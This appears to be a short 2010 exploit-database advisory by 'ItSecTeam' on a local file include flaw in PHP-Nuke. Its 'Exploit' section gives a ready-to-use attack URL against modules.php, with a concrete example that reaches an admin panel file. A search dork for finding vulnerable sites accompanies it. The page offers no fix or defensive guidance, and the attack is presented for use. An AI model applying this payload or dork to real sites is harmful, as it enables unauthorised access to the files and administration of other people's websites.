Php-Nuke - Local File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Php-Nuke - Local File Include Vulnerability
# Published : 2010-03-14
# Author : ItSecTeam
# Previous Title : RogioBiz_PHP_file_manager_V1.2 bypass admin exploit
# Next Title : phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection

=======================================================================================
Topic : Php-Nuke
Bug type : Local File Include Vulnerability
Author : ItSecTeam
Remote : Yes
Status : Bug
===================== Content ======================
( # Advisory Content : Php-Nuke Lastest Version
( # Mail : Bug@ItSecTeam.com
( # Dork : Php-Nuke Lastest Version
( # We Are : M3hr@n.S , 0xd41684c654 And All Team Members!
( # Website : WwW.ItSecTeam.com<http://www.itsecteam.com/>
( # Forum : WwW.Forum.ItSecTeam.com<http://www.itsecteam.com/>
( # Find By : Amin Shokohi(Pejvak!)
=================================================
============================================= Exploit =======================================
( * http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Folder Name&file=File Name
( Ex : http://Site.cOm/PHP-Nuke/modules.php?view=0&name=Content/admin&file=panel
==========================================================================================